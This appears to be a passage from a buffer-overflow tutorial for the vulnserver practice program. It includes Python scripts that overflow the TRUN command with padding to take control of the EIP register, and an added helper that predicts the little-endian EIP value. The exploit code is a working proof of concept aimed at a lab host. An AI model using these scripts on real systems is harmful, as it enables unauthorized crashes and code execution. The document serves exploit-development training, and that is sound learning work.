Overwriting the EIP

PRACTICE ! PRACTICE ! PRACTICE !

Let's now overwrite EIP, which is 4 bytes long on x86. To confirm that our bytes land there, we append a distinct marker, "B" in this case, right after the padding that reaches the saved EBP.

#!/usr/bin/python

import sys, socket

# 2003 bytes of filler reach the saved EBP; the next 4 bytes land in EIP
shellcode = "A" * 2003 + "B" * 4

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(('192.168.0.104', 9999))

	# TRUN is the vulnerable vulnserver command; send the payload as bytes
	s.send(('TRUN /.:/' + shellcode).encode())
	s.close()

except Exception as e:

	print("Error: %s" % e)
	sys.exit(1)

  • We declare a variable called shellcode (at this stage it only holds padding) and fill it with 2003 A's, enough to fill the buffer and overwrite the saved EBP

  • Then we fill EIP with four B characters (0x42)

After sending this, the debugger shows EIP = 42424242: the four "B" bytes (0x42) we appended. That confirms the offset of 2003 is correct and we are on the right path.

  • We now control the EIP register, and from here it is a matter of pointing execution at our shellcode to get code execution on the target
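The following is an added example, not code from the original page: it builds the same TRUN payload as a function, predicts what EIP will read after the crash, and checks an observed EIP value against that prediction. It goes slightly beyond the page by showing why byte order matters: x86 reads the four overwrite bytes little-endian, so a marker of "BCDE" shows up as 0x45444342, which is what you must account for when you later replace the marker with a real address. The host, port and the offset of 2003 are taken from the page's script; the helper names are my own.

```python
#!/usr/bin/env python3
"""Added example (not part of the original page): build the vulnserver TRUN
payload, predict the EIP value the debugger will show, and verify it.
Assumptions: same host/port and offset (2003) as the page's script."""
import socket
import struct

PREFIX = b"TRUN /.:/"               # vulnserver command used on the page
OFFSET = 2003                       # bytes before the saved return address (from the page)
TARGET = ("192.168.0.104", 9999)    # assumption: same target as the page's script


def build_payload(offset=OFFSET, eip=b"BBBB", filler=b"A", prefix=PREFIX):
    """Filler up to and including the saved EBP, then exactly 4 bytes for EIP."""
    if len(eip) != 4:
        raise ValueError("EIP overwrite must be exactly 4 bytes on x86")
    return prefix + filler * offset + eip


def predicted_eip(payload, offset=OFFSET, prefix=PREFIX):
    """Value the debugger will show in EIP after the crash.
    x86 is little-endian, so the four bytes at the offset are read reversed."""
    body = payload[len(prefix):]
    return struct.unpack("<I", body[offset:offset + 4])[0]


def check_offset(observed_eip, payload, offset=OFFSET, prefix=PREFIX):
    """True if the EIP seen in the debugger matches the bytes placed at the offset.
    If EIP reads 0x41414141 instead, the offset is too large and filler
    is landing in EIP; if it reads something unrelated, the offset is too small."""
    return observed_eip == predicted_eip(payload, offset, prefix)


def send_payload(payload, target=TARGET, timeout=5):
    """Deliver the payload to vulnserver (network access required)."""
    with socket.create_connection(target, timeout=timeout) as s:
        s.sendall(payload)


if __name__ == "__main__":
    p = build_payload()
    print("EIP should read 0x%08x" % predicted_eip(p))  # 0x42424242
    send_payload(p)
```

Run it against the lab VM and compare the printed value with EIP in the debugger; if the two differ, feed the observed value to check_offset with a corrected offset until they agree.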
